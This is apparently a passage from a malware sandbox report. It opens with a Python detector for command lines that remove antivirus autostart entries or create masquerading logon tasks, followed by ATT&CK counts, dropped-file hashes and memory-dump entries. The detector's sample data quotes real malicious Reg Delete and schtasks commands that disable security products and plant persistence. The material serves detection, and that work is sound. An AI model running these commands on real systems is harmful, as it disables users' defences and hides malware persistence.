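def check_reg(cmdline):
    """Flag Reg Delete calls that remove a security product's Run-key autostart value."""
    out = []
    for cmd in split_reg_commands(cmdline):
        m = REG_DELETE_RE.match(cmd)
        if m and RUN_KEY_RE.search(m.group(1)) and m.group(2).lower() in AV_RUN_VALUES:
            out.append(Finding("av_autostart_removed", f"{m.group(1)} /v {m.group(2)}"))
    return out


def _opt(args, name):
    """Value of a schtasks /<name> switch; handles the "'path'" double quoting seen above."""
    m = re.search(r"(?i)/" + name + r"""\s+(?:"'?([^"']+)'?"|(\S+))""", args)
    return (m.group(1) or m.group(2)) if m else None


def check_schtasks(cmdline):
    """Flag logon tasks whose target masquerades as a system binary or runs from Temp."""
    m = re.search(r"(?i)\bschtasks(?:\.exe)?\s+/create\b(.*)", cmdline)
    if not m:
        return []
    args = m.group(1)
    target = _opt(args, "tr")
    if not target:
        return []
    name = _opt(args, "tn") or "?"
    trigger = (_opt(args, "sc") or "").upper()
    level = (_opt(args, "rl") or "").upper()
    base = ntpath.basename(target).lower()
    home = ntpath.dirname(target).lower()
    out = []
    if base in EXPECTED_HOMES and home not in EXPECTED_HOMES[base]:
        out.append(Finding("masquerading_logon_task",
                           f'task "{name}": {base} scheduled from {home} ({trigger}, {level})'))
    if r"\appdata\local\temp" in home and trigger == "ONLOGON" and level == "HIGHEST":
        out.append(Finding("highest_logon_task_from_temp", f'task "{name}": {target}'))
    return out


def analyze(cmdlines):
    """Run both checks over a list of process command lines."""
    findings = []
    for c in cmdlines:
        findings.extend(check_reg(c))
        findings.extend(check_schtasks(c))
    return findings


# Constructed sample: a cut-down Reg chain and the five schtasks lines from the tree above.
SAMPLE_CMDLINES = [
    r'Reg Add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{d08d9f98-1c78-4704-87e6-368b0023d831}\Config\OSSProxy\Settings" /v "RunLine" /t REG_SZ /d "%ProgramFiles(x86)%\RelevantKnowledge\rlvknlg.exe -boot" /f /reg:32 '
    r'Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "AvastUI.exe" /f /reg:32 '
    r'Reg Delete "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "egui" /f /reg:32 '
    r'Reg Delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "SUPERAntiSpyware" /f /reg:64 ',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Program Files\Windows Security\BrowserCore\en-US\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\DtcInstall\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "B702" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\B702\B702.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\SysWOW64\twinui\explorer.exe'" /rl HIGHEST /f''',
    r'''schtasks.exe /create /tn "smss" /sc ONLOGON /tr "'C:\Boot\nb-NO\smss.exe'" /rl HIGHEST /f''',
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_CMDLINES):
        print(f"{f.rule:30} {f.detail}")
```

The location check deliberately ignores the task name: the operator can call the task "explorer" or anything else, but explorer.exe has exactly two legitimate homes on the platform this sample ran on, so a path comparison is what holds. The Temp rule is narrower on purpose (ONLOGON and HIGHEST together); a plain scheduled task from Temp is common enough in installers that alerting on it alone is noisy.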
Network
MITRE ATT&CK Matrix (ATT&CK v6)
Persistence
- Modify Existing Service (1)
- Registry Run Keys / Startup Folder (1)
- Scheduled Task (1)
Defense Evasion
- Modify Registry (3)
- Disabling Security Tools (1)
- Virtualization/Sandbox Evasion (1)
- Install Root Certificate (1)
Downloads
- C:\ProgramData\Data\Database.exe
  MD5    30f0a5fe731fd2735b8c196fd0fe91cf
  SHA1   2eb63724fd11bf8e082bcd99301654111ad0d831
  SHA256 13881d50baca8be767b19294971ed5bde32d6abb31dc491510277c9b18369f06
  SHA512 acf8236504c2a738dafc5f765d192d829033aa302fd381d96bda8f82d2f4b58f8bedea4187bda240eef8db6bbcf9ed30c967809144c35a83ce1bcb1250582c62
- C:\ProgramData\Data\install.exe
  MD5    3319cb474eaa2f3812956b271ff29635
  SHA1   74fbed926e8de14fa5eb6a5a47fb873def72fb81
  SHA256 79d27a1a2980812c98a473a189158fcc2f77ca82e5720f9e060ff81e5842f27a
  SHA512 c7139cc744cbafd9618638e7d68e4464da7a6052c10a1906bf7f5ede49128c4f3a05bc49daefbd8a19393887a78a5ca0f7efb3eb06889af9dae0d104870b7347
- C:\ProgramData\Runtimebroker.exe
  MD5    46fd8caf1c1ff128c4d121d58a2e9306
  SHA1   f10607b0db63cf47e9fe8c01fc819e124349dc84
  SHA256 f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
  SHA512 6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
- C:\ProgramData\Systemd\HostData.exe
  MD5    cbf26c74a0a12b5f17ba7596ff6ad19f
  SHA1   6dc733432c290f1fbf5ddda2571b7f538445202b
  SHA256 095094f579ee811aa3da840541b94bca89a4c899e2236a0995ee655261a68983
  SHA512 8a562fc0920cb02fe161c359b8fe73ff02e26c9605f970c6f511ad933fe164eceaec8279fdfe3d198837f2f9980a986f82508ee758a1632bcd7ab041152db11b
- C:\ProgramData\Systemd\config.json
  MD5    a285ac140c8c6806223bfdc02302173e
  SHA1   06ca61cae058c568860858e49615d04dc4a8820d
  SHA256 36d5713cc13ea15449ab8defc943e42cc657b503a79f0859600ea275598441eb
  SHA512 f82eae8304aa9ba504eba0e96468fdac08420b0e158c3263a4f47474b02fb5f751b1bd2335e71a33341d81a495083c7dd8e0479e2c48dbaf6a3f7fefb9f4054b
- C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
  MD5    c558fdaa3884f969f1ec904ae7bbd991
  SHA1   b4f85d04f6bf061a17f52c264c065b786cfd33ff
  SHA256 3e2559b6ca355d011b05b1fcf35ed8b2375586fe6bb01bc367f24eb8ac82975e
  SHA512 6523c778fd9fab0085fafe7b4049e591403865212cc25109cb11f11584c7258bc15e0a5524d089d0f662151b22f3f8e6f871091cec57064c69a9a95903f9e7d4
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5    627b2af61da3d1d1295504e6ceb17f5b
  SHA1   35ced52cb9bd0f2d897a5d9b87299fa5b477a049
  SHA256 edef61840150979d18efd7d23b0636d1b677facf25b6f148aabda7b41ac37951
  SHA512 8c8ef976e8a06183ef8e981e31cce2cc51bdee93bdcea21a6961931778bd814fc3a8bececce6fd0731a2e99ded29f98119489dacd538a203ee0328570f9168e8
- C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
  MD5    ad6843f65114b97c6eb57a6d429acc78
  SHA1   6a31ab6a245aa96672ce6684d799e662d62db082
  SHA256 c8c321bdc13163d313693416ee2aa115fea7465cbbbe4ca571d23f1c057dcf54
  SHA512 20d0287f5da03a7233a6240fb703238b2876d769b7acf76d5ae03972139ac8d67bb38689355687f8e50be2749751ab32fbc15c86e1b95e9c4dfd00d92a28828a
- C:\Users\Admin\AppData\Local\Temp\ADCA.exe
  MD5    e987477b0d14b6d7075f0105aa28ba92
  SHA1   54bb1ac38e517b3adf97ccb38b0d3a8ce71b1fab
  SHA256 4fe326571995d0c02e822c70ad842f70b5f217c4a8dd4ed979f196b60711e00b
  SHA512 bb6fc302409d60e918d130a48708bd83851b50bda20481436ab65d2091d061e61018617c542cfb8df090f79992ce9393fed2341bd1b8a38af4829a2f4383af68
- C:\Users\Admin\AppData\Local\Temp\B702.exe
  MD5    49f58a80993170b4351014d0b5068897
  SHA1   7af2615ec10821cbefb55c602b270c27fa1d6806
  SHA256 905f70426483e7dc4e4d2110cfa0f3a3bbac1ee16a74e287cd51cae0e0babd1c
  SHA512 2ee7f30ee68bbc9da4f3858d1eb188be3fca547f63b36864181b86a70ea5d06f614fdb38b42a22aff24e8d4d720f814b6b103e52d5c01c399eefd28775f88ae2
- C:\Users\Admin\AppData\Local\Temp\BB97.exe
  MD5    46fd8caf1c1ff128c4d121d58a2e9306
  SHA1   f10607b0db63cf47e9fe8c01fc819e124349dc84
  SHA256 f15112b43c4fbd5a9b6cd2009abc371e1180ab7a13a2a745fa79d220f31dcbbc
  SHA512 6307d93927ce8b143dd2babdbbcbb7e5336c2fc315cbcd4c231f9a1fd2199d82ec6bff14aa1f66438ef3ca11ff8806b31de8d344c21cc400dd5795c3788df540
- C:\Users\Admin\AppData\Local\Temp\BE96.exe
  MD5    5707ddada5b7ea6bef434cd294fa12e1
  SHA1   45bb285a597b30e100ed4b15d96a29d718697e5e
  SHA256 85205aa3ad824b5172d5da841d253c3a54aff5d00eb2c208029e9453008f132c
  SHA512 91cbdbf8da7e4e34de45a99359bdc321a66d6646ed14a1042346824c8daa6237281eff3b00fd162009c5e3204e5a7cd3b944f05e18b7f9066d0f9dd16b56bf13
- C:\Users\Admin\AppData\Local\Temp\CCFE.exe
  MD5    68279fe4e69442ca2124d0758006a807
  SHA1   7436d34654cee80938331ca13d90d7664e43ae94
  SHA256 9cafdd248a2ff56d3eecf414762b5d98b2d4583974ed66412b276177de3d674a
  SHA512 7bde7ae6d10cd2aa5deb854ad943e92db6b9ed27360337fd87f7646f6f4a356f94d6430f7ec2f0b352ec401d43dbd4e11cfbdb93c81058481b8389f521d2811d
- C:\Users\Admin\AppData\Local\Temp\CFDE.exe
  MD5    4fb208ec7d17d1ba04dd724693231c5e
  SHA1   d2861fd7a1463d5bbbf6154d7c82d4dbff6112d5
  SHA256 6dfc2d77895bc8653a3a5ef24b97484ace1f716231abd88045e9e08fea2bd449
  SHA512 172aa75c8d4737e91d611af37bfeaa2ad4063f7a9d630215161db32a384d71d8852bbf7114369d8a886ad7eb966b20661e40db1599733e23da393bcfd04692a6
- C:\Users\Admin\AppData\Local\Temp\D26F.exe
  MD5    a14a03079bb9c9fcf9bc1877cd82b9e3
  SHA1   e078ad048beeb0f0b9dc2703073a345f7c04f5f7
  SHA256 ad85ec8bf87669cfc6f874e6fc4def4349ac8dabfdde8976cd90298ae24b6ce9
  SHA512 9a75763ecf168e6c25980e0c37e0bc1a91cdf41dd9f256d09f9c56b186d07dd556513b343930d704776387af8723dc5137df445c7de0e8705a6e7b0268feaee1
- C:\Users\Admin\AppData\Local\Temp\is-9AFQ8.tmp\ADCA.tmp
  MD5    6da8ef761a1ac640f74c4509a3da8b47
  SHA1   de626da008e5e8500388ec7827bcd1158f703d98
  SHA256 232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5
  SHA512 c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402
- C:\Users\Admin\AppData\Local\Temp\is-RGE0R.tmp\ADCA.tmp
  MD5    6da8ef761a1ac640f74c4509a3da8b47
  SHA1   de626da008e5e8500388ec7827bcd1158f703d98
  SHA256 232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5
  SHA512 c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\fsucenter.exe
  MD5    cf8114289d40ec83b53463b1ac8930c9
  SHA1   00036a509bc31c4264a0414d3386f420854ca047
  SHA256 39b7e686bb324ecf81adc0b6a165830cd4d3f7d8a2bbba310930fa023f95bb12
  SHA512 e19af0dcf1aa8253523a1eba1c69f5f26cc63730ef630c60c4ce46d368b037753110426c7e3db333041046dbb04ccffec2bfd48529e1cdaab6547e331df02fc9
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
  MD5    96f1c8a9c83fbf6411f35d3de8fdc77c
  SHA1   41b590133df449c8e0ce247aab7def7cfc39399d
  SHA256 ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e
  SHA512 fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223803.txt
  MD5    fc0a7e5d3da1b0be9221520a98eebe67
  SHA1   11d20ab2475dbfbd2ce74e2c1d6830f1d36372ee
  SHA256 8b88f66b74659d6cf990c0c9950441c57354b7d88a0fb8c561a86bf4815159ed
  SHA512 6697deb223ca3b0d5dbe9122999b7b805e6c1dc7e19e3e89125f8c85fa39bfc4c864ec5a337780878d8f8bfa2fd75b802b0ac5bbadfa8d0cb3d5fc251c13039f
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223804.txt
  MD5    b9a989d81099042a3312dd05cfbaec12
  SHA1   f7ccbb1b2d518233ea4e20bc3dbdaf1109922652
  SHA256 df8fa85eaa864ab4a2e481dfa4cf7272eafe844ef6efd3ea21d1968ff82be8d5
  SHA512 ad3c0ce2acfdad161218fff9ad16a9e7037db4adc4183bedf0945796a604f8cc323a44285823b708210824d01cc8aa4dde097313db71dccb2f3b7577fcf47b88
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223806.txt
  MD5    55ed38caa2cb48b0fbb86fa48971251c
  SHA1   e1e84abc08123ea0076be1255e1d94a43d655a3e
  SHA256 62c2958322bf03b2f1eb31479276421bc6ce3d565f1445d25f91319fae4045b4
  SHA512 8475c6db334b42f2a303e9edb501b02f9cf5e26bb3a1d21bb7b586de7af5c63ce23989940ea0880e2af7e2425bf0fdbeb7e2e93a4c0cd401d863b0b26b81e62c
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223808.txt
  MD5    63589f2ebae11c07e3a72cb94296ca4d
  SHA1   ceb4ee8638b7aa60374880fe92b8528b801ed076
  SHA256 19fba410b8bc1e7a1b3cc107bb0504e653430bd97a0b16d75810b531ee1f7fa0
  SHA512 f18fae54c8d4c40ac5744cc5152c3470611d621b9d4406826197321e763b25d86386426dc651d5ed7abbada474000a1eefa66b3ec0c2f508792243db0d6b3e0d
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223810.txt
  MD5    e353d9800bbfdcedf972447bccbfcdda
  SHA1   9dea5c0edc2f68ffa3e87f52b0add18f0713ebd5
  SHA256 bf0eff163db5129de27cad54ae20545d3bcafbac60f24dfcb849c645f51e14c7
  SHA512 21b46a622ace9a3feacc6be940695559de874c3e71d11602855c40a64c734895bfed68640c7aa24ed73df0928de0fc20f3819d048e84c254b598c3c0d9cff608
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223812.txt
  MD5    bb29e5894a90bdbc3237862d545d23c1
  SHA1   52ef0c24dc7b320306b6b069324e12c21f05d9e6
  SHA256 c7d9b2138e65ab20185d5350323ec9150bee63dc38900a21af9bd8e8ca875f8d
  SHA512 64adc1abe3f000abccf51b9ea274a218bd2dee428fed5587cac9cc1c8574efdea678ba632e1fa9e00dc73cfa75095c6c4902e93b941eba763183414339262fb3
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223815.txt
  MD5    8e562d26fa28034984ae2ecc52d3da07
  SHA1   921ed098663e02b75caf3ee7994fe02a60219b0f
  SHA256 bd3b7a4be61c7382e7bfa20ddd5f2265543bb81e758c7e984f608fead3817074
  SHA512 d3bf5aea01bb0fc966851a505e07a1cd7e1e216de17969f10e0fa279af9def1c461d7abb4e4b0e32f8db22e3a2ef8ac689e980441fe6a63c8492d9075aafba23
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223817.txt
  MD5    09202721734a23bb56c9f02d91912c73
  SHA1   1fde4a9fc728a87632e25ca41f9fafe1c59f7653
  SHA256 1091fb01356ba27dbdf804b2b6613fe38547cc47f2e73c4d65827df56c53994e
  SHA512 5b4b10eb8e7c6951e1b01f20404a996662784ddbfcc2c25752b537a7c641d6e00d1bef877604f8f97db8eb5996ee4a64cf2dc9b88145fecdabfe49770ef5d701
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223819.txt
  MD5    69215097be6aa086198b8c7b1089ddc0
  SHA1   f15a41525a676cc79c822d4a68ae9d7abdcd1ba2
  SHA256 3b8e5e9e273d1c12678b3fc04c5562d5a8a22c69afc74cb5c2a627ca1f76e5d5
  SHA512 4adbb9a3f8f77705d5234f294d4952bad2d4959ac04ecf1a6a6c3fc075105a6447d3b32f089f3f3f3e0098f3d09b04f67650149e0aeb9f7d870c77927d2d3f3c
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223821.txt
  MD5    52aa3a5bcc06171400094709c5667d16
  SHA1   10536a74edee3f7b714d4156c166dee9ad49e55c
  SHA256 bb815a3e0b7e9f78cfc3a5c3b9a5bc641a711d5aabe171cfb74ac931f570cfbf
  SHA512 3543ca2d0d98e25a4b320ffde6c1ea56cbd82f1259e48633b1f6b4afcd68a629150650ff7e925fa8e2b37eb79ebfa3a787c463d896190d0e985164ec406f93ee
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223824.txt
  MD5    29dec779cfedd6a7833f1225d5883968
  SHA1   732852064a3c27026331f4c60785e4049e00be56
  SHA256 f5aea339761fb6c2aff633dc62ee6a979b586a5275ba62880ba7f0550ae50d14
  SHA512 444f205cf004c4ca7fbfd9ff6cd553ef50f4e9d70350eb5b0869c51b836a771cb6d1068b626fa564ee4a58e43ff65fff4d0fd0d291433018dc825703c0a98ac0
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223828.txt
  MD5    0d24036b5b3d23b1e9df4207fa5a337a
  SHA1   1b78f09e4960866ff52c390f37cd2b3e75e1f2c3
  SHA256 fe4321fcc216383b0cbcdcd926585d74f4b5f1a44f2f9b9065ebd34ca45f2e86
  SHA512 1ea6a575b907ac3d624b289a8a45473cf7af84bf406a43d4827e825d0c219660de789ebc27e7054f96ed70dd0fb41c39cd73ccf327351db36d802e3c5ab4605b
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\log20210811_223830.txt
  MD5    d6b64599ecd791404ac045a3ce13d52a
  SHA1   618c775c35e597872d3abd1c529312dad7242ba9
  SHA256 bbd9b263897ea8cf843dd9d7575618ebd2f219261682f860d0de4183c668bd68
  SHA512 632f8355a73bc081c3915f1000f67e297505b0607b3053638fa9f45f70d74fce453e9aa077ba1057da7b256f5ee448accaac3cc9f72164b294f0e707eed2060c
- C:\Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\menu.xml
  MD5    0ad63807522a2fc76deff4eddbc77d35
  SHA1   85ba4baf1b1a623bc8fe5ea9334088de8da390c7
  SHA256 f04362f73243736c636a08982e1f3655ce5824f2e5b0e3e87acbd94d0a906b96
  SHA512 5cacea66310d6f8fc41cc742d6570e389e9df0f9faec4af2c8d036635500bfcf605148ec0a6e8d54b64485abb8a3881f00e7c93bbe7ab35eec85f39c6c33dac9
- C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\BI Video Controller for x86 systems\BI Video Controller for x86 systems.lnk
  MD5    be3b7cef8d230eae3424603cd5c9c4c3
  SHA1   ecc32ad89ae96fee7e3a5ccd546c89c9457d12ed
  SHA256 ddbc5b739186a405ff9765276fea28e8086cb40abc2389d2f48087811261accb
  SHA512 8ebc6cfb4aefc031a60ebdf62269e1ea1b921b46ede2f4a9b7338ea7ee8b90e2100e2725a16faf32d073ce86f75007ffda7fbc33bc7e1eb90568750cb466feb3
- \??\c:\users\admin\appdata\local\temp\is-rge0r.tmp\adca.tmp
  MD5    6da8ef761a1ac640f74c4509a3da8b47
  SHA1   de626da008e5e8500388ec7827bcd1158f703d98
  SHA256 232fb3aecf0becf95a9d8e820939fb1043a3401d9fd953da7ba13cbab0086ff5
  SHA512 c9e8c6ae521dbd7e92af06e8a3581835058667ff6b502aa55ff4993c1b639e896c8f3ab6e0ca105e5635a66a40d92b4db96512e2ed337268b76ed611155e2402
- \Users\Admin\AppData\Roaming\BI Video Controller for x86 systems\libfreetype-4.dll
  MD5    96f1c8a9c83fbf6411f35d3de8fdc77c
  SHA1   41b590133df449c8e0ce247aab7def7cfc39399d
  SHA256 ae8db0fc9690c6047bd1d1aeb7cd254060c0623700bb184ce3f1b3d1daffc39e
  SHA512 fa214f15b7c77eca2760aa2489debc5d7244f5535a7b725b49ae7f9ba6f5341a04ee2ccabe15f1e70a542582ed64758d1b4e2d61faaacf2a56e3ec750df76baa
- memory/212-205-0x0000000000B00000-0x0000000000B09000-memory.dmp  Filesize 36KB
- memory/212-207-0x0000000000AF0000-0x0000000000AFF000-memory.dmp  Filesize 60KB
- memory/212-203-0x0000000000000000-mapping.dmp
- memory/212-124-0x0000000000400000-0x00000000004D8000-memory.dmp  Filesize 864KB
- memory/212-118-0x0000000000000000-mapping.dmp
- memory/716-196-0x0000000000F50000-0x0000000000FBB000-memory.dmp  Filesize 428KB
- memory/716-185-0x0000000000000000-mapping.dmp
- memory/716-195-0x0000000000FC0000-0x0000000001034000-memory.dmp  Filesize 464KB
- memory/852-153-0x0000000004E00000-0x0000000004E01000-memory.dmp  Filesize 4KB
- memory/852-144-0x0000000000000000-mapping.dmp
- memory/852-149-0x0000000000460000-0x0000000000461000-memory.dmp  Filesize 4KB
- memory/852-152-0x0000000005220000-0x0000000005221000-memory.dmp  Filesize 4KB
- memory/852-155-0x0000000004F80000-0x0000000004F81000-memory.dmp  Filesize 4KB
- memory/852-240-0x0000000005030000-0x0000000005051000-memory.dmp  Filesize 132KB
- memory/852-158-0x0000000004D20000-0x000000000521E000-memory.dmp  Filesize 5.0MB
- memory/892-667-0x0000000000000000-mapping.dmp
- memory/1136-212-0x00000000007C0000-0x00000000007CC000-memory.dmp  Filesize 48KB
- memory/1136-209-0x0000000000000000-mapping.dmp
- memory/1136-211-0x00000000007D0000-0x00000000007D6000-memory.dmp  Filesize 24KB
- memory/1520-115-0x0000000000402E1A-mapping.dmp
- memory/1520-114-0x0000000000400000-0x0000000000409000-memory.dmp  Filesize 36KB
- memory/1536-227-0x00000000004F0000-0x00000000004F4000-memory.dmp  Filesize 16KB
- memory/1536-213-0x0000000000000000-mapping.dmp
- memory/1536-228-0x00000000004E0000-0x00000000004E9000-memory.dmp  Filesize 36KB
- memory/1808-164-0x0000000000400000-0x0000000002C84000-memory.dmp  Filesize 40.5MB
- memory/1808-137-0x0000000000000000-mapping.dmp
- memory/1808-157-0x00000000048A0000-0x00000000048DB000-memory.dmp  Filesize 236KB
- memory/1812-200-0x0000000000000000-mapping.dmp
- memory/1812-204-0x0000000000970000-0x000000000097B000-memory.dmp  Filesize 44KB
- memory/1812-202-0x0000000000980000-0x0000000000987000-memory.dmp  Filesize 28KB
- memory/1816-160-0x0000000000000000-mapping.dmp
- memory/1868-122-0x0000000000000000-mapping.dmp
- memory/1868-125-0x00000000007B0000-0x00000000008FA000-memory.dmp  Filesize 1.3MB
- memory/2084-141-0x0000000000A80000-0x0000000000A81000-memory.dmp  Filesize 4KB
- memory/2084-136-0x0000000076EB0000-0x000000007703E000-memory.dmp  Filesize 1.6MB
- memory/2084-154-0x0000000005150000-0x0000000005151000-memory.dmp  Filesize 4KB
- memory/2084-126-0x0000000000000000-mapping.dmp
- memory/2084-150-0x0000000005110000-0x0000000005111000-memory.dmp  Filesize 4KB
- memory/2084-156-0x0000000005040000-0x0000000005041000-memory.dmp  Filesize 4KB
- memory/2084-148-0x00000000050B0000-0x00000000050B1000-memory.dmp  Filesize 4KB
- memory/2084-143-0x0000000005660000-0x0000000005661000-memory.dmp  Filesize 4KB
- memory/2084-159-0x00000000052F0000-0x00000000052F1000-memory.dmp  Filesize 4KB
- memory/2100-133-0x0000000000000000-mapping.dmp
- memory/2100-147-0x00000000007C0000-0x000000000086E000-memory.dmp  Filesize 696KB
- memory/2156-608-0x0000000000000000-mapping.dmp
- memory/2192-197-0x0000000000000000-mapping.dmp
- memory/2192-198-0x00000000005E0000-0x00000000005E7000-memory.dmp  Filesize 28KB
- memory/2192-199-0x00000000005D0000-0x00000000005DC000-memory.dmp  Filesize 48KB
- memory/2324-596-0x0000000000000000-mapping.dmp
- memory/2580-192-0x0000000000B40000-0x0000000000B41000-memory.dmp  Filesize 4KB
- memory/2580-215-0x0000000006370000-0x0000000006371000-memory.dmp  Filesize 4KB
- memory/2580-167-0x0000000000000000-mapping.dmp
- memory/2580-249-0x00000000069B0000-0x00000000069B1000-memory.dmp  Filesize 4KB
- memory/2580-612-0x0000000000000000-mapping.dmp
- memory/2580-222-0x0000000006670000-0x0000000006671000-memory.dmp  Filesize 4KB
- memory/2580-182-0x0000000076EB0000-0x000000007703E000-memory.dmp  Filesize 1.6MB
- memory/2580-178-0x0000000001110000-0x0000000001111000-memory.dmp  Filesize 4KB
- memory/2580-216-0x0000000006A70000-0x0000000006A71000-memory.dmp  Filesize 4KB
- memory/2640-619-0x0000000000000000-mapping.dmp
- memory/2648-134-0x0000000000400000-0x00000000004D8000-memory.dmp  Filesize 864KB
- memory/2648-129-0x0000000000000000-mapping.dmp
- memory/2652-208-0x00000000009C0000-0x00000000009C5000-memory.dmp  Filesize 20KB
- memory/2652-206-0x0000000000000000-mapping.dmp
- memory/2652-210-0x00000000009B0000-0x00000000009B9000-memory.dmp  Filesize 36KB
- memory/2892-635-0x0000000000000000-mapping.dmp
- memory/3000-117-0x0000000000EC0000-0x0000000000ED6000-memory.dmp  Filesize 88KB
- memory/3108-633-0x0000000000000000-mapping.dmp
- memory/3492-201-0x0000000000400000-0x0000000002C84000-memory.dmp  Filesize 40.5MB
- memory/3492-187-0x0000000000000000-mapping.dmp
- memory/3492-116-0x0000000002C70000-0x0000000002DBA000-memory.dmp  Filesize 1.3MB
- memory/3544-237-0x0000000000490000-0x0000000000499000-memory.dmp  Filesize 36KB
- memory/3544-230-0x0000000000000000-mapping.dmp
- memory/3544-236-0x00000000004A0000-0x00000000004A5000-memory.dmp  Filesize 20KB
- memory/3648-193-0x00000000048B0000-0x0000000004941000-memory.dmp  Filesize 580KB
- memory/3648-174-0x0000000000000000-mapping.dmp
- memory/3648-191-0x0000000000400000-0x0000000002CB0000-memory.dmp  Filesize 40.7MB
- memory/3656-621-0x0000000000000000-mapping.dmp
- memory/3692-539-0x0000000000000000-mapping.dmp
- memory/3892-586-0x0000000000000000-mapping.dmp
- memory/3896-675-0x0000000000000000-mapping.dmp
- memory/3904-226-0x0000000008470000-0x0000000008471000-memory.dmp  Filesize 4KB
- memory/3904-253-0x0000000009750000-0x0000000009751000-memory.dmp  Filesize 4KB
- memory/3904-219-0x00000000072F0000-0x00000000072F1000-memory.dmp  Filesize 4KB
- memory/3904-221-0x0000000007AB0000-0x0000000007AB1000-memory.dmp  Filesize 4KB
- memory/3904-223-0x0000000007A40000-0x0000000007A41000-memory.dmp  Filesize 4KB
- memory/3904-224-0x0000000008390000-0x0000000008391000-memory.dmp  Filesize 4KB
- memory/3904-234-0x0000000008B50000-0x0000000008B51000-memory.dmp  Filesize 4KB
- memory/3904-229-0x0000000008120000-0x0000000008121000-memory.dmp  Filesize 4KB
- memory/3904-233-0x0000000007472000-0x0000000007473000-memory.dmp  Filesize 4KB
- memory/3904-214-0x0000000000000000-mapping.dmp
- memory/3904-231-0x0000000007470000-0x0000000007471000-memory.dmp  Filesize 4KB
- memory/3904-254-0x00000000097C0000-0x00000000097C1000-memory.dmp  Filesize 4KB
- memory/3904-260-0x0000000007473000-0x0000000007474000-memory.dmp  Filesize 4KB
- memory/3904-252-0x0000000009AA0000-0x0000000009AA1000-memory.dmp  Filesize 4KB
- memory/4060-235-0x0000000000000000-mapping.dmp
- memory/4060-239-0x0000000000910000-0x0000000000919000-memory.dmp  Filesize 36KB
- memory/4060-238-0x0000000000920000-0x0000000000925000-memory.dmp  Filesize 20KB
- memory/4072-188-0x00000000049B0000-0x0000000004A43000-memory.dmp  Filesize 588KB
- memory/4072-194-0x0000000000400000-0x0000000002CB1000-memory.dmp  Filesize 40.7MB
- memory/4072-171-0x0000000000000000-mapping.dmp
- memory/4088-573-0x0000000000000000-mapping.dmp
- memory/4104-582-0x0000000000000000-mapping.dmp
- memory/4104-665-0x0000000000000000-mapping.dmp
- memory/4112-600-0x0000000000000000-mapping.dmp
- memory/4128-248-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize 596KB
- memory/4128-244-0x000000000044003F-mapping.dmp
- memory/4128-243-0x0000000000400000-0x0000000000495000-memory.dmp  Filesize 596KB
- memory/4216-590-0x0000000000000000-mapping.dmp
- memory/4244-269-0x0000000007D30000-0x0000000007D31000-memory.dmp  Filesize 4KB
- memory/4244-280-0x0000000009A90000-0x0000000009A91000-memory.dmp  Filesize 4KB
- memory/4244-283-0x0000000009600000-0x000000000975B000-memory.dmp  Filesize 1.4MB
- memory/4244-259-0x0000000000000000-mapping.dmp
- memory/4244-282-0x0000000006C13000-0x0000000006C14000-memory.dmp  Filesize 4KB
- memory/4244-270-0x0000000006C10000-0x0000000006C11000-memory.dmp  Filesize 4KB
- memory/4244-271-0x0000000006C12000-0x0000000006C13000-memory.dmp  Filesize 4KB
- memory/4280-671-0x0000000000000000-mapping.dmp
- memory/4308-604-0x0000000000000000-mapping.dmp
- memory/4368-616-0x0000000000000000-mapping.dmp
